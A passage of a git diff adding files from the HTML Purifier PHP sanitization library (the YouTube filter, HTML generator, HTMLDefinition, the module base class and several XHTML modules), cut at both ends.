array('<', '>', '&'), + array('\3C ', '\3E ', '\26 '), + $css + ); + } + return $css; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Filter/YouTube.php b/lib/htmlpurifier/library/HTMLPurifier/Filter/YouTube.php new file mode 100644 index 000000000..23df221ea --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Filter/YouTube.php @@ -0,0 +1,39 @@ +<?php + +class HTMLPurifier_Filter_YouTube extends HTMLPurifier_Filter +{ + + public $name = 'YouTube'; + + public function preFilter($html, $config, $context) { + $pre_regex = '#<object[^>]+>.+?'. + 'http://www.youtube.com/((?:v|cp)/[A-Za-z0-9\-_=]+).+?</object>#s'; + $pre_replace = '<span class="youtube-embed">\1</span>'; + return preg_replace($pre_regex, $pre_replace, $html); + } + + public function postFilter($html, $config, $context) { + $post_regex = '#<span class="youtube-embed">((?:v|cp)/[A-Za-z0-9\-_=]+)</span>#'; + return preg_replace_callback($post_regex, array($this, 'postFilterCallback'), $html); + } + + protected function armorUrl($url) { + return str_replace('--', '--', $url); + } + + protected function postFilterCallback($matches) { + $url = $this->armorUrl($matches[1]); + return '<object width="425" height="350" type="application/x-shockwave-flash" '. + 'data="http://www.youtube.com/'.$url.'">'. + '<param name="movie" value="http://www.youtube.com/'.$url.'"></param>'. + '<!--[if IE]>'. + '<embed src="http://www.youtube.com/'.$url.'"'. + 'type="application/x-shockwave-flash"'. + 'wmode="transparent" width="425" height="350" />'. + '<![endif]-->'. + '</object>'; + + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Generator.php b/lib/htmlpurifier/library/HTMLPurifier/Generator.php new file mode 100644 index 000000000..fee1a5f84 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Generator.php @@ -0,0 +1,254 @@ +<?php + +/** + * Generates HTML from tokens. + * @todo Refactor interface so that configuration/context is determined + * upon instantiation, no need for messy generateFromTokens() calls + * @todo Make some of the more internal functions protected, and have + * unit tests work around that + */ +class HTMLPurifier_Generator +{ + + /** + * Whether or not generator should produce XML output + */ + private $_xhtml = true; + + /** + * :HACK: Whether or not generator should comment the insides of <script> tags + */ + private $_scriptFix = false; + + /** + * Cache of HTMLDefinition during HTML output to determine whether or + * not attributes should be minimized. + */ + private $_def; + + /** + * Cache of %Output.SortAttr + */ + private $_sortAttr; + + /** + * Cache of %Output.FlashCompat + */ + private $_flashCompat; + + /** + * Cache of %Output.FixInnerHTML + */ + private $_innerHTMLFix; + + /** + * Stack for keeping track of object information when outputting IE + * compatibility code. + */ + private $_flashStack = array(); + + /** + * Configuration for the generator + */ + protected $config; + + /** + * @param $config Instance of HTMLPurifier_Config + * @param $context Instance of HTMLPurifier_Context + */ + public function __construct($config, $context) { + $this->config = $config; + $this->_scriptFix = $config->get('Output.CommentScriptContents'); + $this->_innerHTMLFix = $config->get('Output.FixInnerHTML'); + $this->_sortAttr = $config->get('Output.SortAttr'); + $this->_flashCompat = $config->get('Output.FlashCompat'); + $this->_def = $config->getHTMLDefinition(); + $this->_xhtml = $this->_def->doctype->xml; + } + + /** + * Generates HTML from an array of tokens. + * @param $tokens Array of HTMLPurifier_Token + * @param $config HTMLPurifier_Config object + * @return Generated HTML + */ + public function generateFromTokens($tokens) { + if (!$tokens) return ''; + + // Basic algorithm + $html = ''; + for ($i = 0, $size = count($tokens); $i < $size; $i++) { + if ($this->_scriptFix && $tokens[$i]->name === 'script' + && $i + 2 < $size && $tokens[$i+2] instanceof HTMLPurifier_Token_End) { + // script special case + // the contents of the script block must be ONE token + // for this to work. + $html .= $this->generateFromToken($tokens[$i++]); + $html .= $this->generateScriptFromToken($tokens[$i++]); + } + $html .= $this->generateFromToken($tokens[$i]); + } + + // Tidy cleanup + if (extension_loaded('tidy') && $this->config->get('Output.TidyFormat')) { + $tidy = new Tidy; + $tidy->parseString($html, array( + 'indent'=> true, + 'output-xhtml' => $this->_xhtml, + 'show-body-only' => true, + 'indent-spaces' => 2, + 'wrap' => 68, + ), 'utf8'); + $tidy->cleanRepair(); + $html = (string) $tidy; // explicit cast necessary + } + + // Normalize newlines to system defined value + if ($this->config->get('Core.NormalizeNewlines')) { + $nl = $this->config->get('Output.Newline'); + if ($nl === null) $nl = PHP_EOL; + if ($nl !== "\n") $html = str_replace("\n", $nl, $html); + } + return $html; + } + + /** + * Generates HTML from a single token. + * @param $token HTMLPurifier_Token object. + * @return Generated HTML + */ + public function generateFromToken($token) { + if (!$token instanceof HTMLPurifier_Token) { + trigger_error('Cannot generate HTML from non-HTMLPurifier_Token object', E_USER_WARNING); + return ''; + + } elseif ($token instanceof HTMLPurifier_Token_Start) { + $attr = $this->generateAttributes($token->attr, $token->name); + if ($this->_flashCompat) { + if ($token->name == "object") { + $flash = new stdclass(); + $flash->attr = $token->attr; + $flash->param = array(); + $this->_flashStack[] = $flash; + } + } + return '<' . $token->name . ($attr ? ' ' : '') . $attr . '>'; + + } elseif ($token instanceof HTMLPurifier_Token_End) { + $_extra = ''; + if ($this->_flashCompat) { + if ($token->name == "object" && !empty($this->_flashStack)) { + // doesn't do anything for now + } + } + return $_extra . '</' . $token->name . '>'; + + } elseif ($token instanceof HTMLPurifier_Token_Empty) { + if ($this->_flashCompat && $token->name == "param" && !empty($this->_flashStack)) { + $this->_flashStack[count($this->_flashStack)-1]->param[$token->attr['name']] = $token->attr['value']; + } + $attr = $this->generateAttributes($token->attr, $token->name); + return '<' . $token->name . ($attr ? ' ' : '') . $attr . + ( $this->_xhtml ? ' /': '' ) // <br /> v. <br> + . '>'; + + } elseif ($token instanceof HTMLPurifier_Token_Text) { + return $this->escape($token->data, ENT_NOQUOTES); + + } elseif ($token instanceof HTMLPurifier_Token_Comment) { + return '<!--' . $token->data . '-->'; + } else { + return ''; + + } + } + + /** + * Special case processor for the contents of script tags + * @warning This runs into problems if there's already a literal + * --> somewhere inside the script contents. + */ + public function generateScriptFromToken($token) { + if (!$token instanceof HTMLPurifier_Token_Text) return $this->generateFromToken($token); + // Thanks <http://lachy.id.au/log/2005/05/script-comments> + $data = preg_replace('#//\s*$#', '', $token->data); + return '<!--//--><![CDATA[//><!--' . "\n" . trim($data) . "\n" . '//--><!]]>'; + } + + /** + * Generates attribute declarations from attribute array. + * @note This does not include the leading or trailing space. + * @param $assoc_array_of_attributes Attribute array + * @param $element Name of element attributes are for, used to check + * attribute minimization. + * @return Generate HTML fragment for insertion. + */ + public function generateAttributes($assoc_array_of_attributes, $element = false) { + $html = ''; + if ($this->_sortAttr) ksort($assoc_array_of_attributes); + foreach ($assoc_array_of_attributes as $key => $value) { + if (!$this->_xhtml) { + // Remove namespaced attributes + if (strpos($key, ':') !== false) continue; + // Check if we should minimize the attribute: val="val" -> val + if ($element && !empty($this->_def->info[$element]->attr[$key]->minimized)) { + $html .= $key . ' '; + continue; + } + } + // Workaround for Internet Explorer innerHTML bug. + // Essentially, Internet Explorer, when calculating + // innerHTML, omits quotes if there are no instances of + // angled brackets, quotes or spaces. However, when parsing + // HTML (for example, when you assign to innerHTML), it + // treats backticks as quotes. Thus, + // <img alt="``" /> + // becomes + // <img alt=`` /> + // becomes + // <img alt='' /> + // Fortunately, all we need to do is trigger an appropriate + // quoting style, which we do by adding an extra space. + // This also is consistent with the W3C spec, which states + // that user agents may ignore leading or trailing + // whitespace (in fact, most don't, at least for attributes + // like alt, but an extra space at the end is barely + // noticeable). Still, we have a configuration knob for + // this, since this transformation is not necesary if you + // don't process user input with innerHTML or you don't plan + // on supporting Internet Explorer. + if ($this->_innerHTMLFix) { + if (strpos($value, '`') !== false) { + // check if correct quoting style would not already be + // triggered + if (strcspn($value, '"\' <>') === strlen($value)) { + // protect! + $value .= ' '; + } + } + } + $html .= $key.'="'.$this->escape($value).'" '; + } + return rtrim($html); + } + + /** + * Escapes raw text data. + * @todo This really ought to be protected, but until we have a facility + * for properly generating HTML here w/o using tokens, it stays + * public. + * @param $string String data to escape for HTML. + * @param $quote Quoting style, like htmlspecialchars. ENT_NOQUOTES is + * permissible for non-attribute output. + * @return String escaped data. + */ + public function escape($string, $quote = null) { + // Workaround for APC bug on Mac Leopard reported by sidepodcast + // http://htmlpurifier.org/phorum/read.php?3,4823,4846 + if ($quote === null) $quote = ENT_COMPAT; + return htmlspecialchars($string, $quote, 'UTF-8'); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/HTMLDefinition.php b/lib/htmlpurifier/library/HTMLPurifier/HTMLDefinition.php new file mode 100644 index 000000000..b079d44c1 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/HTMLDefinition.php @@ -0,0 +1,425 @@ +<?php + +/** + * Definition of the purified HTML that describes allowed children, + * attributes, and many other things. + * + * Conventions: + * + * All member variables that are prefixed with info + * (including the main $info array) are used by HTML Purifier internals + * and should not be directly edited when customizing the HTMLDefinition. + * They can usually be set via configuration directives or custom + * modules. + * + * On the other hand, member variables without the info prefix are used + * internally by the HTMLDefinition and MUST NOT be used by other HTML + * Purifier internals. Many of them, however, are public, and may be + * edited by userspace code to tweak the behavior of HTMLDefinition. + * + * @note This class is inspected by Printer_HTMLDefinition; please + * update that class if things here change. + * + * @warning Directives that change this object's structure must be in + * the HTML or Attr namespace! + */ +class HTMLPurifier_HTMLDefinition extends HTMLPurifier_Definition +{ + + // FULLY-PUBLIC VARIABLES --------------------------------------------- + + /** + * Associative array of element names to HTMLPurifier_ElementDef + */ + public $info = array(); + + /** + * Associative array of global attribute name to attribute definition. + */ + public $info_global_attr = array(); + + /** + * String name of parent element HTML will be going into. + */ + public $info_parent = 'div'; + + /** + * Definition for parent element, allows parent element to be a + * tag that's not allowed inside the HTML fragment. + */ + public $info_parent_def; + + /** + * String name of element used to wrap inline elements in block context + * @note This is rarely used except for BLOCKQUOTEs in strict mode + */ + public $info_block_wrapper = 'p'; + + /** + * Associative array of deprecated tag name to HTMLPurifier_TagTransform + */ + public $info_tag_transform = array(); + + /** + * Indexed list of HTMLPurifier_AttrTransform to be performed before validation. + */ + public $info_attr_transform_pre = array(); + + /** + * Indexed list of HTMLPurifier_AttrTransform to be performed after validation. + */ + public $info_attr_transform_post = array(); + + /** + * Nested lookup array of content set name (Block, Inline) to + * element name to whether or not it belongs in that content set. + */ + public $info_content_sets = array(); + + /** + * Indexed list of HTMLPurifier_Injector to be used. + */ + public $info_injector = array(); + + /** + * Doctype object + */ + public $doctype; + + + + // RAW CUSTOMIZATION STUFF -------------------------------------------- + + /** + * Adds a custom attribute to a pre-existing element + * @note This is strictly convenience, and does not have a corresponding + * method in HTMLPurifier_HTMLModule + * @param $element_name String element name to add attribute to + * @param $attr_name String name of attribute + * @param $def Attribute definition, can be string or object, see + * HTMLPurifier_AttrTypes for details + */ + public function addAttribute($element_name, $attr_name, $def) { + $module = $this->getAnonymousModule(); + if (!isset($module->info[$element_name])) { + $element = $module->addBlankElement($element_name); + } else { + $element = $module->info[$element_name]; + } + $element->attr[$attr_name] = $def; + } + + /** + * Adds a custom element to your HTML definition + * @note See HTMLPurifier_HTMLModule::addElement for detailed + * parameter and return value descriptions. + */ + public function addElement($element_name, $type, $contents, $attr_collections, $attributes = array()) { + $module = $this->getAnonymousModule(); + // assume that if the user is calling this, the element + // is safe. This may not be a good idea + $element = $module->addElement($element_name, $type, $contents, $attr_collections, $attributes); + return $element; + } + + /** + * Adds a blank element to your HTML definition, for overriding + * existing behavior + * @note See HTMLPurifier_HTMLModule::addBlankElement for detailed + * parameter and return value descriptions. + */ + public function addBlankElement($element_name) { + $module = $this->getAnonymousModule(); + $element = $module->addBlankElement($element_name); + return $element; + } + + /** + * Retrieves a reference to the anonymous module, so you can + * bust out advanced features without having to make your own + * module. + */ + public function getAnonymousModule() { + if (!$this->_anonModule) { + $this->_anonModule = new HTMLPurifier_HTMLModule(); + $this->_anonModule->name = 'Anonymous'; + } + return $this->_anonModule; + } + + private $_anonModule = null; + + + // PUBLIC BUT INTERNAL VARIABLES -------------------------------------- + + public $type = 'HTML'; + public $manager; /**< Instance of HTMLPurifier_HTMLModuleManager */ + + /** + * Performs low-cost, preliminary initialization. + */ + public function __construct() { + $this->manager = new HTMLPurifier_HTMLModuleManager(); + } + + protected function doSetup($config) { + $this->processModules($config); + $this->setupConfigStuff($config); + unset($this->manager); + + // cleanup some of the element definitions + foreach ($this->info as $k => $v) { + unset($this->info[$k]->content_model); + unset($this->info[$k]->content_model_type); + } + } + + /** + * Extract out the information from the manager + */ + protected function processModules($config) { + + if ($this->_anonModule) { + // for user specific changes + // this is late-loaded so we don't have to deal with PHP4 + // reference wonky-ness + $this->manager->addModule($this->_anonModule); + unset($this->_anonModule); + } + + $this->manager->setup($config); + $this->doctype = $this->manager->doctype; + + foreach ($this->manager->modules as $module) { + foreach($module->info_tag_transform as $k => $v) { + if ($v === false) unset($this->info_tag_transform[$k]); + else $this->info_tag_transform[$k] = $v; + } + foreach($module->info_attr_transform_pre as $k => $v) { + if ($v === false) unset($this->info_attr_transform_pre[$k]); + else $this->info_attr_transform_pre[$k] = $v; + } + foreach($module->info_attr_transform_post as $k => $v) { + if ($v === false) unset($this->info_attr_transform_post[$k]); + else $this->info_attr_transform_post[$k] = $v; + } + foreach ($module->info_injector as $k => $v) { + if ($v === false) unset($this->info_injector[$k]); + else $this->info_injector[$k] = $v; + } + } + + $this->info = $this->manager->getElements(); + $this->info_content_sets = $this->manager->contentSets->lookup; + + } + + /** + * Sets up stuff based on config. We need a better way of doing this. + */ + protected function setupConfigStuff($config) { + + $block_wrapper = $config->get('HTML.BlockWrapper'); + if (isset($this->info_content_sets['Block'][$block_wrapper])) { + $this->info_block_wrapper = $block_wrapper; + } else { + trigger_error('Cannot use non-block element as block wrapper', + E_USER_ERROR); + } + + $parent = $config->get('HTML.Parent'); + $def = $this->manager->getElement($parent, true); + if ($def) { + $this->info_parent = $parent; + $this->info_parent_def = $def; + } else { + trigger_error('Cannot use unrecognized element as parent', + E_USER_ERROR); + $this->info_parent_def = $this->manager->getElement($this->info_parent, true); + } + + // support template text + $support = "(for information on implementing this, see the ". + "support forums) "; + + // setup allowed elements ----------------------------------------- + + $allowed_elements = $config->get('HTML.AllowedElements'); + $allowed_attributes = $config->get('HTML.AllowedAttributes'); // retrieve early + + if (!is_array($allowed_elements) && !is_array($allowed_attributes)) { + $allowed = $config->get('HTML.Allowed'); + if (is_string($allowed)) { + list($allowed_elements, $allowed_attributes) = $this->parseTinyMCEAllowedList($allowed); + } + } + + if (is_array($allowed_elements)) { + foreach ($this->info as $name => $d) { + if(!isset($allowed_elements[$name])) unset($this->info[$name]); + unset($allowed_elements[$name]); + } + // emit errors + foreach ($allowed_elements as $element => $d) { + $element = htmlspecialchars($element); // PHP doesn't escape errors, be careful! + trigger_error("Element '$element' is not supported $support", E_USER_WARNING); + } + } + + // setup allowed attributes --------------------------------------- + + $allowed_attributes_mutable = $allowed_attributes; // by copy! + if (is_array($allowed_attributes)) { + + // This actually doesn't do anything, since we went away from + // global attributes. It's possible that userland code uses + // it, but HTMLModuleManager doesn't! + foreach ($this->info_global_attr as $attr => $x) { + $keys = array($attr, "*@$attr", "*.$attr"); + $delete = true; + foreach ($keys as $key) { + if ($delete && isset($allowed_attributes[$key])) { + $delete = false; + } + if (isset($allowed_attributes_mutable[$key])) { + unset($allowed_attributes_mutable[$key]); + } + } + if ($delete) unset($this->info_global_attr[$attr]); + } + + foreach ($this->info as $tag => $info) { + foreach ($info->attr as $attr => $x) { + $keys = array("$tag@$attr", $attr, "*@$attr", "$tag.$attr", "*.$attr"); + $delete = true; + foreach ($keys as $key) { + if ($delete && isset($allowed_attributes[$key])) { + $delete = false; + } + if (isset($allowed_attributes_mutable[$key])) { + unset($allowed_attributes_mutable[$key]); + } + } + if ($delete) { + if ($this->info[$tag]->attr[$attr]->required) { + trigger_error("Required attribute '$attr' in element '$tag' was not allowed, which means '$tag' will not be allowed either", E_USER_WARNING); + } + unset($this->info[$tag]->attr[$attr]); + } + } + } + // emit errors + foreach ($allowed_attributes_mutable as $elattr => $d) { + $bits = preg_split('/[.@]/', $elattr, 2); + $c = count($bits); + switch ($c) { + case 2: + if ($bits[0] !== '*') { + $element = htmlspecialchars($bits[0]); + $attribute = htmlspecialchars($bits[1]); + if (!isset($this->info[$element])) { + trigger_error("Cannot allow attribute '$attribute' if element '$element' is not allowed/supported $support"); + } else { + trigger_error("Attribute '$attribute' in element '$element' not supported $support", + E_USER_WARNING); + } + break; + } + // otherwise fall through + case 1: + $attribute = htmlspecialchars($bits[0]); + trigger_error("Global attribute '$attribute' is not ". + "supported in any elements $support", + E_USER_WARNING); + break; + } + } + + } + + // setup forbidden elements --------------------------------------- + + $forbidden_elements = $config->get('HTML.ForbiddenElements'); + $forbidden_attributes = $config->get('HTML.ForbiddenAttributes'); + + foreach ($this->info as $tag => $info) { + if (isset($forbidden_elements[$tag])) { + unset($this->info[$tag]); + continue; + } + foreach ($info->attr as $attr => $x) { + if ( + isset($forbidden_attributes["$tag@$attr"]) || + isset($forbidden_attributes["*@$attr"]) || + isset($forbidden_attributes[$attr]) + ) { + unset($this->info[$tag]->attr[$attr]); + continue; + } // this segment might get removed eventually + elseif (isset($forbidden_attributes["$tag.$attr"])) { + // $tag.$attr are not user supplied, so no worries! + trigger_error("Error with $tag.$attr: tag.attr syntax not supported for HTML.ForbiddenAttributes; use tag@attr instead", E_USER_WARNING); + } + } + } + foreach ($forbidden_attributes as $key => $v) { + if (strlen($key) < 2) continue; + if ($key[0] != '*') continue; + if ($key[1] == '.') { + trigger_error("Error with $key: *.attr syntax not supported for HTML.ForbiddenAttributes; use attr instead", E_USER_WARNING); + } + } + + // setup injectors ----------------------------------------------------- + foreach ($this->info_injector as $i => $injector) { + if ($injector->checkNeeded($config) !== false) { + // remove injector that does not have it's required + // elements/attributes present, and is thus not needed. + unset($this->info_injector[$i]); + } + } + } + + /** + * Parses a TinyMCE-flavored Allowed Elements and Attributes list into + * separate lists for processing. Format is element[attr1|attr2],element2... + * @warning Although it's largely drawn from TinyMCE's implementation, + * it is different, and you'll probably have to modify your lists + * @param $list String list to parse + * @param array($allowed_elements, $allowed_attributes) + * @todo Give this its own class, probably static interface + */ + public function parseTinyMCEAllowedList($list) { + + $list = str_replace(array(' ', "\t"), '', $list); + + $elements = array(); + $attributes = array(); + + $chunks = preg_split('/(,|[\n\r]+)/', $list); + foreach ($chunks as $chunk) { + if (empty($chunk)) continue; + // remove TinyMCE element control characters + if (!strpos($chunk, '[')) { + $element = $chunk; + $attr = false; + } else { + list($element, $attr) = explode('[', $chunk); + } + if ($element !== '*') $elements[$element] = true; + if (!$attr) continue; + $attr = substr($attr, 0, strlen($attr) - 1); // remove trailing ] + $attr = explode('|', $attr); + foreach ($attr as $key) { + $attributes["$element.$key"] = true; + } + } + + return array($elements, $attributes); + + } + + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/HTMLModule.php b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule.php new file mode 100644 index 000000000..072cf6808 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule.php @@ -0,0 +1,244 @@ +<?php + +/** + * Represents an XHTML 1.1 module, with information on elements, tags + * and attributes. + * @note Even though this is technically XHTML 1.1, it is also used for + * regular HTML parsing. We are using modulization as a convenient + * way to represent the internals of HTMLDefinition, and our + * implementation is by no means conforming and does not directly + * use the normative DTDs or XML schemas. + * @note The public variables in a module should almost directly + * correspond to the variables in HTMLPurifier_HTMLDefinition. + * However, the prefix info carries no special meaning in these + * objects (include it anyway if that's the correspondence though). + * @todo Consider making some member functions protected + */ + +class HTMLPurifier_HTMLModule +{ + + // -- Overloadable ---------------------------------------------------- + + /** + * Short unique string identifier of the module + */ + public $name; + + /** + * Informally, a list of elements this module changes. Not used in + * any significant way. + */ + public $elements = array(); + + /** + * Associative array of element names to element definitions. + * Some definitions may be incomplete, to be merged in later + * with the full definition. + */ + public $info = array(); + + /** + * Associative array of content set names to content set additions. + * This is commonly used to, say, add an A element to the Inline + * content set. This corresponds to an internal variable $content_sets + * and NOT info_content_sets member variable of HTMLDefinition. + */ + public $content_sets = array(); + + /** + * Associative array of attribute collection names to attribute + * collection additions. More rarely used for adding attributes to + * the global collections. Example is the StyleAttribute module adding + * the style attribute to the Core. Corresponds to HTMLDefinition's + * attr_collections->info, since the object's data is only info, + * with extra behavior associated with it. + */ + public $attr_collections = array(); + + /** + * Associative array of deprecated tag name to HTMLPurifier_TagTransform + */ + public $info_tag_transform = array(); + + /** + * List of HTMLPurifier_AttrTransform to be performed before validation. + */ + public $info_attr_transform_pre = array(); + + /** + * List of HTMLPurifier_AttrTransform to be performed after validation. + */ + public $info_attr_transform_post = array(); + + /** + * List of HTMLPurifier_Injector to be performed during well-formedness fixing. + * An injector will only be invoked if all of it's pre-requisites are met; + * if an injector fails setup, there will be no error; it will simply be + * silently disabled. + */ + public $info_injector = array(); + + /** + * Boolean flag that indicates whether or not getChildDef is implemented. + * For optimization reasons: may save a call to a function. Be sure + * to set it if you do implement getChildDef(), otherwise it will have + * no effect! + */ + public $defines_child_def = false; + + /** + * Boolean flag whether or not this module is safe. If it is not safe, all + * of its members are unsafe. Modules are safe by default (this might be + * slightly dangerous, but it doesn't make much sense to force HTML Purifier, + * which is based off of safe HTML, to explicitly say, "This is safe," even + * though there are modules which are "unsafe") + * + * @note Previously, safety could be applied at an element level granularity. + * We've removed this ability, so in order to add "unsafe" elements + * or attributes, a dedicated module with this property set to false + * must be used. + */ + public $safe = true; + + /** + * Retrieves a proper HTMLPurifier_ChildDef subclass based on + * content_model and content_model_type member variables of + * the HTMLPurifier_ElementDef class. There is a similar function + * in HTMLPurifier_HTMLDefinition. + * @param $def HTMLPurifier_ElementDef instance + * @return HTMLPurifier_ChildDef subclass + */ + public function getChildDef($def) {return false;} + + // -- Convenience ----------------------------------------------------- + + /** + * Convenience function that sets up a new element + * @param $element Name of element to add + * @param $type What content set should element be registered to? + * Set as false to skip this step. + * @param $contents Allowed children in form of: + * "$content_model_type: $content_model" + * @param $attr_includes What attribute collections to register to + * element? + * @param $attr What unique attributes does the element define? + * @note See ElementDef for in-depth descriptions of these parameters. + * @return Created element definition object, so you + * can set advanced parameters + */ + public function addElement($element, $type, $contents, $attr_includes = array(), $attr = array()) { + $this->elements[] = $element; + // parse content_model + list($content_model_type, $content_model) = $this->parseContents($contents); + // merge in attribute inclusions + $this->mergeInAttrIncludes($attr, $attr_includes); + // add element to content sets + if ($type) $this->addElementToContentSet($element, $type); + // create element + $this->info[$element] = HTMLPurifier_ElementDef::create( + $content_model, $content_model_type, $attr + ); + // literal object $contents means direct child manipulation + if (!is_string($contents)) $this->info[$element]->child = $contents; + return $this->info[$element]; + } + + /** + * Convenience function that creates a totally blank, non-standalone + * element. + * @param $element Name of element to create + * @return Created element + */ + public function addBlankElement($element) { + if (!isset($this->info[$element])) { + $this->elements[] = $element; + $this->info[$element] = new HTMLPurifier_ElementDef(); + $this->info[$element]->standalone = false; + } else { + trigger_error("Definition for $element already exists in module, cannot redefine"); + } + return $this->info[$element]; + } + + /** + * Convenience function that registers an element to a content set + * @param Element to register + * @param Name content set (warning: case sensitive, usually upper-case + * first letter) + */ + public function addElementToContentSet($element, $type) { + if (!isset($this->content_sets[$type])) $this->content_sets[$type] = ''; + else $this->content_sets[$type] .= ' | '; + $this->content_sets[$type] .= $element; + } + + /** + * Convenience function that transforms single-string contents + * into separate content model and content model type + * @param $contents Allowed children in form of: + * "$content_model_type: $content_model" + * @note If contents is an object, an array of two nulls will be + * returned, and the callee needs to take the original $contents + * and use it directly. + */ + public function parseContents($contents) { + if (!is_string($contents)) return array(null, null); // defer + switch ($contents) { + // check for shorthand content model forms + case 'Empty': + return array('empty', ''); + case 'Inline': + return array('optional', 'Inline | #PCDATA'); + case 'Flow': + return array('optional', 'Flow | #PCDATA'); + } + list($content_model_type, $content_model) = explode(':', $contents); + $content_model_type = strtolower(trim($content_model_type)); + $content_model = trim($content_model); + return array($content_model_type, $content_model); + } + + /** + * Convenience function that merges a list of attribute includes into + * an attribute array. + * @param $attr Reference to attr array to modify + * @param $attr_includes Array of includes / string include to merge in + */ + public function mergeInAttrIncludes(&$attr, $attr_includes) { + if (!is_array($attr_includes)) { + if (empty($attr_includes)) $attr_includes = array(); + else $attr_includes = array($attr_includes); + } + $attr[0] = $attr_includes; + } + + /** + * Convenience function that generates a lookup table with boolean + * true as value. + * @param $list List of values to turn into a lookup + * @note You can also pass an arbitrary number of arguments in + * place of the regular argument + * @return Lookup array equivalent of list + */ + public function makeLookup($list) { + if (is_string($list)) $list = func_get_args(); + $ret = array(); + foreach ($list as $value) { + if (is_null($value)) continue; + $ret[$value] = true; + } + return $ret; + } + + /** + * Lazy load construction of the module after determining whether + * or not it's needed, and also when a finalized configuration object + * is available. + * @param $config Instance of HTMLPurifier_Config + */ + public function setup($config) {} + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Bdo.php b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Bdo.php new file mode 100644 index 000000000..3d66f1b4e --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Bdo.php @@ -0,0 +1,31 @@ +<?php + +/** + * XHTML 1.1 Bi-directional Text Module, defines elements that + * declare directionality of content. Text Extension Module. + */ +class HTMLPurifier_HTMLModule_Bdo extends HTMLPurifier_HTMLModule +{ + + public $name = 'Bdo'; + public $attr_collections = array( + 'I18N' => array('dir' => false) + ); + + public function setup($config) { + $bdo = $this->addElement( + 'bdo', 'Inline', 'Inline', array('Core', 'Lang'), + array( + 'dir' => 'Enum#ltr,rtl', // required + // The Abstract Module specification has the attribute + // inclusions wrong for bdo: bdo allows Lang + ) + ); + $bdo->attr_transform_post['required-dir'] = new HTMLPurifier_AttrTransform_BdoDir(); + + $this->attr_collections['I18N']['dir'] = 'Enum#ltr,rtl'; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/CommonAttributes.php b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/CommonAttributes.php new file mode 100644 index 000000000..7c15da84f --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/CommonAttributes.php @@ -0,0 +1,26 @@ +<?php + +class HTMLPurifier_HTMLModule_CommonAttributes extends HTMLPurifier_HTMLModule +{ + public $name = 'CommonAttributes'; + + public $attr_collections = array( + 'Core' => array( + 0 => array('Style'), + // 'xml:space' => false, + 'class' => 'Class', + 'id' => 'ID', + 'title' => 'CDATA', + ), + 'Lang' => array(), + 'I18N' => array( + 0 => array('Lang'), // proprietary, for xml:lang/lang + ), + 'Common' => array( + 0 => array('Core', 'I18N') + ) + ); + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Edit.php b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Edit.php new file mode 100644 index 000000000..ff9369055 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Edit.php @@ -0,0 +1,38 @@ +<?php + +/** + * XHTML 1.1 Edit Module, defines editing-related elements. Text Extension + * Module. + */ +class HTMLPurifier_HTMLModule_Edit extends HTMLPurifier_HTMLModule +{ + + public $name = 'Edit'; + + public function setup($config) { + $contents = 'Chameleon: #PCDATA | Inline ! #PCDATA | Flow'; + $attr = array( + 'cite' => 'URI', + // 'datetime' => 'Datetime', // not implemented + ); + $this->addElement('del', 'Inline', $contents, 'Common', $attr); + $this->addElement('ins', 'Inline', $contents, 'Common', $attr); + } + + // HTML 4.01 specifies that ins/del must not contain block + // elements when used in an inline context, chameleon is + // a complicated workaround to acheive this effect + + // Inline context ! Block context (exclamation mark is + // separator, see getChildDef for parsing) + + public $defines_child_def = true; + public function getChildDef($def) { + if ($def->content_model_type != 'chameleon') return false; + $value = explode('!', $def->content_model); + return new HTMLPurifier_ChildDef_Chameleon($value[0], $value[1]); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Forms.php b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Forms.php new file mode 100644 index 000000000..b963529a7 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Forms.php @@ -0,0 +1,119 @@ +<?php + +/** + * XHTML 1.1 Forms module, defines all form-related elements found in HTML 4. + */ +class HTMLPurifier_HTMLModule_Forms extends HTMLPurifier_HTMLModule +{ + public $name = 'Forms'; + public $safe = false; + + public $content_sets = array( + 'Block' => 'Form', + 'Inline' => 'Formctrl', + ); + + public function setup($config) { + $form = $this->addElement('form', 'Form', + 'Required: Heading | List | Block | fieldset', 'Common', array( + 'accept' => 'ContentTypes', + 'accept-charset' => 'Charsets', + 'action*' => 'URI', + 'method' => 'Enum#get,post', + // really ContentType, but these two are the only ones used today + 'enctype' => 'Enum#application/x-www-form-urlencoded,multipart/form-data', + )); + $form->excludes = array('form' => true); + + $input = $this->addElement('input', 'Formctrl', 'Empty', 'Common', array( + 'accept' => 'ContentTypes', + 'accesskey' => 'Character', + 'alt' => 'Text', + 'checked' => 'Bool#checked', + 'disabled' => 'Bool#disabled', + 'maxlength' => 'Number', + 'name' => 'CDATA', + 'readonly' => 'Bool#readonly', + 'size' => 'Number', + 'src' => 'URI#embedded', + 'tabindex' => 'Number', + 'type' => 'Enum#text,password,checkbox,button,radio,submit,reset,file,hidden,image', + 'value' => 'CDATA', + )); + $input->attr_transform_post[] = new HTMLPurifier_AttrTransform_Input(); + + $this->addElement('select', 'Formctrl', 'Required: optgroup | option', 'Common', array( + 